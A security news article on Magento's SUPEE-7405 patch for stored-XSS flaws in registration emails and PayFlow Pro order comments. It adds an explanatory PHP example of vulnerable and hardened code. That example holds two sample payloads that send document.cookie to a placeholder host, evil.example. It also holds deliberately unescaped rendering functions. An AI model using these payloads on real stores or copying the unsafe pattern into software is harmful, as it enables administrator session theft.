E-commerce platform vendor Magento has issued patches for several cross-site scripting (XSS) vulnerabilities that allowed malicious JavaScript to be injected into a store's customer registration and order-handling flows. Because the injected script is stored and later executed in an administrator's browser, it could allow the store to be taken over remotely.
The affected products are Magento CE prior to 1.9.2.3 and Magento EE prior to 1.14.2.3. The company's update, slugged SUPEE-7405, fixes 20 issues, two of them rated critical.
The first critical issue allows a user, during registration, to supply an email address containing JavaScript that the Magento software does not properly validate. When the stored value is later displayed to an administrator, the script runs in that administrator's session, which could allow the session to be hijacked or administrative actions to be triggered remotely. The second critical fix addresses an issue where a user could append comments to an order using a specially crafted request that goes through the PayFlow Pro payment module (a PayPal integration, not Magento's own). The comment text is likewise not properly filtered, so JavaScript can be saved in the database for later execution.
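Both critical issues follow the same stored-XSS pattern: untrusted text is accepted without validation, persisted, and later written into the admin backend's HTML unescaped. The PHP below is an added illustration of that pattern beside a hardened version; it is not Magento's code, not the SUPEE-7405 patch, and the function names, the array-backed "database" and the sample payload are all constructed for the example.

```php
<?php
// Added example, not Magento code: the stored-XSS pattern from the article
// (unvalidated customer email, unfiltered order comment) beside a hardened form.
// All function names and the in-memory "database" are hypothetical.

declare(strict_types=1);

// Constructed sample input: a registration email carrying a script payload.
const MALICIOUS_EMAIL = 'attacker@example.com"><script>fetch("https://evil.example/?c="+document.cookie)</script>';

// Constructed sample input: an order comment carrying a script payload.
const MALICIOUS_COMMENT = "Please ship fast.\n<img src=x onerror=\"fetch('https://evil.example/?c='+document.cookie)\">";

// --- Vulnerable pattern -----------------------------------------------------

// Accepts whatever the form sends and stores it verbatim.
function storeEmailUnchecked(array &$customers, string $email): void
{
    $customers[] = ['email' => $email];
}

// The admin grid writes the stored value straight into the page markup,
// so the payload executes in the administrator's browser.
function renderCustomerRowUnsafe(array $customer): string
{
    return '<td>' . $customer['email'] . '</td>';
}

// Same defect for free-text order comments shown in the order view.
function renderOrderCommentUnsafe(string $comment): string
{
    return '<p>' . nl2br($comment) . '</p>';
}

// --- Hardened pattern -------------------------------------------------------

// Step 1: validate on input. FILTER_VALIDATE_EMAIL rejects the characters the
// payload depends on ('<', '>', '"', whitespace), so it is never stored.
function storeEmailValidated(array &$customers, string $email): bool
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false; // reject the registration, nothing is persisted
    }
    $customers[] = ['email' => $email];
    return true;
}

// Step 2: escape on output no matter what was stored. ENT_QUOTES also covers
// the attribute-breaking '"' in the email payload.
function renderCustomerRowSafe(array $customer): string
{
    return '<td>' . htmlspecialchars($customer['email'], ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Order comments are legitimately free text, so input validation cannot reject
// them; output escaping is the only defence. Escape first, then add <br>,
// otherwise nl2br's own tags would be escaped too.
function renderOrderCommentSafe(string $comment): string
{
    return '<p>' . nl2br(htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8')) . '</p>';
}

// --- Walk-through -----------------------------------------------------------

$customers = [];
storeEmailUnchecked($customers, MALICIOUS_EMAIL);
echo renderCustomerRowUnsafe($customers[0]), PHP_EOL;    // live <script> tag in the admin page
echo renderOrderCommentUnsafe(MALICIOUS_COMMENT), PHP_EOL; // live <img onerror> in the order view

$hardened = [];
$accepted = storeEmailValidated($hardened, MALICIOUS_EMAIL);   // false: rejected at registration
$accepted = storeEmailValidated($hardened, 'buyer@example.com'); // true: well-formed address stored
echo renderCustomerRowSafe($customers[0]), PHP_EOL;      // payload shown as inert text even if it was stored
echo renderOrderCommentSafe(MALICIOUS_COMMENT), PHP_EOL;  // tag characters neutralised, line break kept
```

The two layers are deliberately independent: the email validation stops the first issue from ever reaching the database, while output escaping covers the second issue, where free-text comments cannot be rejected, and also protects rows that were stored before the validation existed.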
Of the remaining 18 vulnerabilities, four were rated "high", 10 "medium" and four "low".
Magento said it was not aware of these vulnerabilities having been used in any attacks.
Magento previously patched a zero-day vulnerability in October 2015 that could have been used by an attacker to access credentials and potentially gain complete control of a store's Magento database.